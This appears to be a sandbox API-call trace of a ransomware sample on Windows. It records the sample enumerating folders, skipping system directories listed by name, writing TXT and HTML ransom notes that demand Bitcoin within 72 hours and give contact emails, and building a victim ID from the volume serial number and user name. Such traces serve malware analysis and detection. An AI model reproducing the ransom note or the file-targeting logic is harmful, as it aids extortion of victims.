	[0177.319] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\") returned="C:\\Users\\All Users\\Microsoft\\Vault\\"
	[0177.319] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\") returned="C:\\Users\\All Users\\Microsoft\\Vault\\"
	[0177.319] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Vault\\*.*"
	[0177.319] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\*.*" (normalized: "c:\\users\\all users\\microsoft\\vault\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0177.319] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Vault\\*.*") returned 38
	[0177.320] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.320] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Vault\\*.*", cchLength=0x26 | out: lpsz="c:\\users\\all users\\microsoft\\vault\\*.*") returned 0x26
	[0177.320] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.320] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="windows") returned 0x0
	[0177.320] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.320] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="boot") returned 0x0
	[0177.320] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.320] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="system volume information") returned 0x0
	[0177.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.321] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.321] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="temp") returned 0x0
	[0177.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.321] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="program files") returned 0x0
	[0177.321] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.321] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.322] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.322] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="appdata") returned 0x0
	[0177.322] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.322] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="application data") returned 0x0
	[0177.322] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.322] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="winnt") returned 0x0
	[0177.323] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.323] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="tmp") returned 0x0
	[0177.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.324] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="cache") returned 0x0
	[0177.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.324] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.324] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="webcache") returned 0x0
	[0177.324] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.325] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="inetcache") returned 0x0
	[0177.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.325] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="nvidia") returned 0x0
	[0177.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.325] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="packages") returned 0x0
	[0177.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.325] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="cookies") returned 0x0
	[0177.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.326] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="programdata") returned 0x0
	[0177.326] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.326] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AC658CB4-9126-49BD-B877-31EEDAB3F204", cAlternateFileName="AC658C~1")) returned 1
	[0177.326] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AC658CB4-9126-49BD-B877-31EEDAB3F204", cAlternateFileName="AC658C~1")) returned 0
	[0177.326] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0177.326] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0177.327] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Vault" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault") returned="C:\\Users\\All Users\\Microsoft\\Vault"
	[0177.327] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Vault\\*.*"
	[0177.327] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.327] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.327] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Vault\\HELP_DECRYPT_YOUR_FILES.TXT") returned 62
	[0177.327] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\vault\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.331] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0177.331] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0177.335] CloseHandle (hObject=0x384) returned 1
	[0177.335] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.335] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.336] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0177.337] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.337] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\vault\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.337] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.338] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.338] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0177.338] CloseHandle (hObject=0x384) returned 1
	[0177.339] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.339] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.340] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.340] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Vault\\HELP_DECRYPT_YOUR_FILES.HTML") returned 63
	[0177.340] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\vault\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.344] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.344] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0177.347] CloseHandle (hObject=0x384) returned 1
	[0177.347] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.347] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.348] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.348] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0177.356] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.356] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\vault\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0177.357] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.357] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.357] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0177.357] CloseHandle (hObject=0x384) returned 1
	[0177.358] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\*.*" (normalized: "c:\\users\\all users\\microsoft\\vault\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x833c8089, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0177.358] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Vault\\*.*") returned 38
	[0177.358] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.358] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Vault\\*.*", cchLength=0x26 | out: lpsz="c:\\users\\all users\\microsoft\\vault\\*.*") returned 0x26
	[0177.358] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.359] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="windows") returned 0x0
	[0177.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.359] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="boot") returned 0x0
	[0177.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.359] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="system volume information") returned 0x0
	[0177.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.359] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.359] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.360] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="temp") returned 0x0
	[0177.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.360] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="program files") returned 0x0
	[0177.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.360] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.360] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="appdata") returned 0x0
	[0177.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="application data") returned 0x0
	[0177.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="winnt") returned 0x0
	[0177.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="tmp") returned 0x0
	[0177.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.361] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="cache") returned 0x0
	[0177.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="webcache") returned 0x0
	[0177.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="inetcache") returned 0x0
	[0177.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.362] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="nvidia") returned 0x0
	[0177.362] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="packages") returned 0x0
	[0177.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="cookies") returned 0x0
	[0177.363] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.363] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\*.*", lpSrch="programdata") returned 0x0
	[0177.363] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.363] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.363] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x833c8089, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.364] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.364] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AC658CB4-9126-49BD-B877-31EEDAB3F204", cAlternateFileName="AC658C~1")) returned 1
	[0177.364] lstrcmpW (lpString1="AC658CB4-9126-49BD-B877-31EEDAB3F204", lpString2="..") returned 1
	[0177.364] lstrcmpW (lpString1="AC658CB4-9126-49BD-B877-31EEDAB3F204", lpString2=".") returned 1
	[0177.364] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Vault" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault") returned="C:\\Users\\All Users\\Microsoft\\Vault"
	[0177.364] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\") returned="C:\\Users\\All Users\\Microsoft\\Vault\\"
	[0177.364] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\", lpString2="AC658CB4-9126-49BD-B877-31EEDAB3F204" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204"
	[0177.364] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204"
	[0177.364] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\"
	[0177.365] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\"
	[0177.365] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*"
	[0177.365] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.365] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*") returned 75
	[0177.365] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.366] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*", cchLength=0x4b | out: lpsz="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*") returned 0x4b
	[0177.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.366] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="windows") returned 0x0
	[0177.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.366] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="boot") returned 0x0
	[0177.366] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.366] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="system volume information") returned 0x0
	[0177.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.367] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.367] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="temp") returned 0x0
